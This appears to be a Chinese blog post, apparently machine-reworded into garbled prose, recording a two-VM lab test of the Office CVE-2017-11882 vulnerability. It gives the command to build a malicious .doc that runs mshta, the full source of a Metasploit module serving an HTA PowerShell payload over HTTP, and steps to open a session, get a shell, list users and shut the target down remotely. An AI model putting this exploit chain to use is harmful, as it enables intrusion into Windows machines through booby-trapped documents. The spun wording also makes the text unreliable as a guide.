参考文章2

图片 6

 

Office隐蔽17年的尾巴CVE_2017_11882测验记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参谋小说1:

参考作品2:

 

POC地址:

 

中间环节现身,msf连接数据库战败的事态,消除措施:

 

1.塑造规范

 

 

此间搭建两台虚构机实行测验!

 

测验机配置消息:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

首先在kali下安装nginx,或许tomcat应该也是足以的,首先将转移的doc文件放在/usr/share/nginx/html目录下,方便被攻击的机器获取doc文件。

 

启动nginx服务:systemctl start nginx

 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c
“mshta ;; -o cev2.doc

#
将下载好的尾巴模块放在msf任性目录下

root@kali:/# mv cve_2017_11882.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_11882.rb的内容如下:

##

#
This module requires Metasploit:

#
Current source:

##

class
MetasploitModule  < Msf::Exploit::Remote

  Rank =
NormalRanking

  include
Msf::Exploit::Remote::HttpServer

  def
initialize(info  = {})

    super(update_info(info,

      ‘Name’
=> ‘Microsoft Office Payload Delivery’,

      ‘Description’
=> %q{

        This
module generates an command to place within

        a
word document, that when executed, will retrieve a HTA payload

        via
HTTP from an web server. Currently have not figured out how

        to
generate a doc.

      },

      ‘License’
=> MSF_LICENSE,

      ‘Arch’
=> ARCH_X86,

      ‘Platform’
=> ‘win’,

      ‘Targets’
=>

        [

          [‘Automatic’,
{} ],

        ],

      ‘DefaultTarget’
=> 0,

    ))

  end

  def
on_request_uri(cli, _request)

    print_status(“Delivering
payload”)

    p
= regenerate_payload(cli)

    data =
Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      ‘win’,

      p.encoded,

      ‘hta-psh’,

      {
:arch => ARCH_X86, :platform => ‘win ‘}

    )

    send_response(cli,
data, ‘Content-Type’ => ‘application/hta’)

  end

  def
primer

    url =
get_uri

    print_status(“Place
the following DDE in an MS document:”)

    print_line(“mshta.exe
“#{url}””)

  end

 

下一场,这里在接收msfconsole早前,需要先开拓数据库,举例 service postgresql start 

开采数据库之后,步向msfconsole,然后对msf举办伊始化,推行msf
init

之后search
cve_2017_11882探索漏洞模块,然后根据【参谋小说2】进行布署,最后exploit 之后运维对 8080
端口的监听,至于为什么是8080端口笔者也不太了解啊!

 

2.有备无患,临门一脚

 

这时候,只须要在 win7
上经过浏览器的到
cve2.doc文书档案,展开之后,kali中命令行马上显示已经获取到了再三再四,

图片 1

图片 2

session命令获得回复,session -i 【id】创立连接

shell命令能够拿到cmd,推行net user查看客商

图片 3

图片 4

 

3.尝试效果

 

经过这几个漏洞,能够明目张胆的举办一些命令,比如关机,删除一些文本,收罗一些类别消息还是特别管用的

在桌面新建文件夹

图片 5

长途关机

图片 6

固然如此赢拿到了命令行,不过透过net
user命令能够见到登陆的顾客等第是Guest,那就限定了有的急需权限较高的吩咐推行!

再便是这里win7未有安装杀软,作者不掌握安装杀软之后word文书档案会不会被查杀呢?